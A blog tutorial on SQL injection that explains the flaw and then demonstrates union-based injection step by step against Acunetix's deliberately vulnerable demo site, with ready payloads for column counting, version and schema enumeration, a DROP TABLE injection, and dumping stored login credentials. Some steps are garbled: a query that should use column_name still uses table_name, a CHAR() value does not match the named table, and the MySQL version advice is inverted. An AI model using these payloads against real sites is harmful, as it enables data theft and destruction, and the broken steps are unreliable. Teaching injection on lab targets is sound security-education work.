SQL Injection- Not a Cup of Cake

What is SQL Injection:

I have gone through many SQL Injectioimagesn tutorials before writing this post. One thing was common at every place, the queries coming from the readers. Many people don’t know what actually SQL Injection is. They think that they can easily enter into the database and make some changes, or they can simply inject some query and will have the username and password of the administrator. Well !!! Till some extent the concept is true but it is not that much easy.

So first we need to learn what is SQL Injection or better we should know what is SQL… SQL, the Structured Query Language, is the standard to access databases. Most web applications today use an SQL database to store persistent data for the application. It is likely that any web application you are testing uses an SQL database in the backend. Like many languages, SQL syntax is a mixture of database instructions and user data. If a developer is not careful, the user data could be interpreted as instructions, and a remote user could perform arbitrary instructions on the database. So, whenever we want any data to be accessed from any application our request goes in the form of SQL queries. Suppose for example, in any online library if we want to access any particular book then our request will go in form of following language,

 "SELECT booktitle FROM my_library WHERE " + " bookname=' " +SQLtutorial+ " ' ";

So, in the above case the application takes the bookname from the user and searches it in the TABLE named my_library and if after matching returns that particular page. So it means if that particular name doesn’t match it should not return anything, but in actual scenario there is nothing stopping an attacker from injecting SQL statements in the bookname field to change the SQL query. Let’s re-examine the SQL query string.

The code expects the bookname string to be data. However, an attacker can input any characters he or she pleases. Imagine if an attacker entered the bookname ’OR 1=1 —  then the query string would look like this:

SELECT booktitle FROM my_library WHERE " + " bookname= ' ' OR 1=1 -- '

Note:- The double dash (–) tells the SQL parser that everything to the right is a comment.

The SELECT statement now acts much differently, because it will now return booktitle where the bookname is a zero length string (‘ ‘) or where 1=1; but 1=1 is always true! So this statement will return all the booktitle from my_library. In this case, the attacker placed SQL instructions (‘OR 1=1 –) in the bookname field instead of data.

Choosing Appropriate SQL Injection Code:

To inject SQL instructions successfully, the attacker must turn the developer’s existing SQL instructions into a valid SQL statement. Generally query like these work.

  • ‘ OR 1=1 —
  • ‘) OR 1=1 —

Also, many web applications provide extensive error reporting and debugging information. For example, attempting ‘ OR 1=1 — blindly in a web application often gives you an educational error message like this:

Error executing query: You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right
syntax to use near 'SELECT (title, body) FROM blog_table WHERE cat='OR 1=1' at line 1

The particular error message shows the whole SQL statement. In this case, it appears that the SQL database was expecting an integer, not a string, so the injection string OR 1=1 –, without the proceeding apostrophe would work.
However, the attacker could inject other queries. For example, setting the username to this,

 ' OR 1=1; DROP TABLE user_table; --

would change this query to this,

SELECT id FROM user_table WHERE username=' ' OR 1=1; DROP TABLE user_table; -- ' AND password = PASSWORD('x');

which is equivalent to this:

SELECT id FROM user_table WHERE username=' ' OR 1=1; DROP TABLE user_table;

This statement will perform the syntactically correct SELECT statement and erase the user_table with the SQL DROP command.

There are many kinds of SQL Injection possible i.e. around 12 to 15. Some important types are:

  • Union Exploitation technique
  • Boolean Exploitation technique
  • Error based Exploitation technique
  • Out of band Exploitation technique
  • Blind SQL Injection

Today we will discuss about UNION based SQL Injection.

Note:- This tutorial is being carried out on demo test site provided by ACUNETIX, You can also try on the same website as discussed below.

Vulnerable Urls

Lets say there is a web application or website that has a url in it like this

http://testphp.vulnweb.com/product.php?pic=1

and it is prone to sql injection because the developer of that site did not properly escape the parameter id. This can be simply tested by trying to open the url

http://testphp.vulnweb.com/product.php?pic=1'

Fig [1]

We just added a single quote in the parameter. If this url throws an error or reacts in an unexpected manner then it is clear that the database has got the unexpected single quote which the application did not escape properly. So in this case this input parameter “pic” is vulnerable to SQL injection. Fig [1]

 Find the number of Columns.
  • We found SQL Injection Vulnerable website now it’s time to find no. of Columns present in the Database.
  • To do that replace that one single quote ( ‘ ) with “Order By no.” Statement until you find the Error message. Change the no. from 1,2,3,4,5,6,7,8,9,….. Until you get an Error Message like “Unknown Column”

    For Example :- Change it’s Order By 1,2,3,4 like below Example :-

http://testphp.vulnweb.com/product.php?pic=1 order by 1--
http://testphp.vulnweb.com/product.php?pic=1 order by 2--
http://testphp.vulnweb.com/product.php?pic=1 order by 3--  and so on...

Fig [2]

  • If you get an Error on Order by 9 that means the DB have 8 number of Columns and If u had found error on Order by 6 then the DB have 5 number of Columns. I mean if you put Order by 12 and Suppose the DB have only 11 Columns then Website will show Error like this.: An error occurred  Unknown column ’12’ in ‘order clause’. Fig [2]

This trick is actually used to find the number of Columns in DB. Understand the Below example and you will get to know.

Here, the Vulnerable website Shown Error on Order by 12 that means my Vulnerable website have 11 number of columns in its DB. So now here I found number of columns in my DB :- Number of Columns = 11

 Find the Vulnerable Column.

Basically if the website is vulnerable then it have vulnerability in its column and now it’s time to find out that column. Well we have successfully discovered number of columns present in Database. let us find Vulnerable Column by using the Query “Union Select columns_sequence“. And also change the ID Value to Negative, I mean Suppose the website have this URL product.php?pic=8 Change it to index.php?id=-8. Just put minus sign “-” before pic.

For Eg. If the Number of Column is 11 then the query is as follows :-

http://testphp.vulnweb.com/product.php?pic=-1 union select 1,2,3,4,5,6,7,8,9,10,11--

And Suppose above Method won’t work then use below method:-

http://testphp.vulnweb.com/product.php?pic=-1 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11--

Fig [3]

  • And Once if the Query has been Executed then it will display the number of Column.
  • In the Above result, I found five vulnerable Columns 7,2,3,9 & 4 Fig [3].
  • Let us take 2 as our tutorial. Now, as we found our vulnerable column let’s proceed to the next step.
Finding version, Database and User

Now this time we’ve to find out website Database version, User, Database Name & some other Information, Just replace Vulnerable Column number with “version()

For Eg.

http://testphp.vulnweb.com/product.php?pic=-1 and 1=0 union select 1,version(),3,4,5,6,7,8,9,10,11--

And now Hit Enter : and you will  get result. Fig [4]

Now again do the same replace Vulnerable column with different query like :- database(), user() Fig [5]

Fig [4]

Fig [5]

And Suppose above Method won’t work then use below method

http://testphp.vulnweb.com/product.php?pic=-1 and 1=0 union select 1,unhex(hex(@@version)),3,4,5,6,7,8,9,10,11--
Finding the Table name
  • Here we found vulnerable Column, DB Version name and User it’s time to get Table name. If the database version is 4 or above then you gave to guess the table names (Blind SQL Injection attack)
  • Let us find now Table name of the Database, Same here Replace Vulnerable Column number with “group_concat(table_name) and add the “from information_schema.tables where table_schema=database()”
http://testphp.vulnweb.com/product.php?pic=-1 and 1=0 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--

Fig [6]

Now hit Enter and you can see Complete Table of Database. Fig [6]

Great we found Table name now find the table name that is related to admin or user. as you can see in the above image there is one table name :-  users. Let us choose that table users and Go on Next step.

Finding the Column Name

Now replace the “group_concat(table_name) with the “group_concat(column_name)”
Replace the “from information_schema.tables where table_schema=database()–” with “FROM information_schema.columns WHERE table_name=mysqlchar–

We have to convert the table name to MySql CHAR() string .
For that we need to install HackBar add-on in our Firefox Browser. Install the HackBar add-on From this link.
Once you installed the add-on, you can see a toolbar that will look like the following one. If you are not able to see the Hackbar, then press F9.
Select sql->Mysql->MysqlChar() in the Hackbar. Fig [7]

Fig [7]

It will ask you to enter string that you want to convert to MySQLCHAR().  We want to convert the table name to MySQLCHAR .  In our case the table name is ‘users’. Fig [8]

Fig [8]

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar. Fig [9]

Fig [9]

Copy and paste the code at the end of the url instead of the “mysqlchar”

 http://testphp.vulnweb.com/product.php?pic=-1 and 1=0 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 FROM information_schema.columns WHERE table_name=CHAR(117, 115, 101, 114, 115)--

The above query will display the list of column. Fig [10]

Fig [10]

Now replace the group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2) and replace the ” from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)” with the “from table_name”

 http://testphp.vulnweb.com/product.php?pic=-1 and 1=0 union select 1,group_concat(users,0x3a,users),3,4,5,6,7,8,9,10,11 FROM users--

If the above query displays the ‘column is not found‘ error, then try another column name from the list.
If we got luck, then it will display the data stored in the database depending on your column name. For instance, username and password column will display the login credentials stored in the database.

2 comments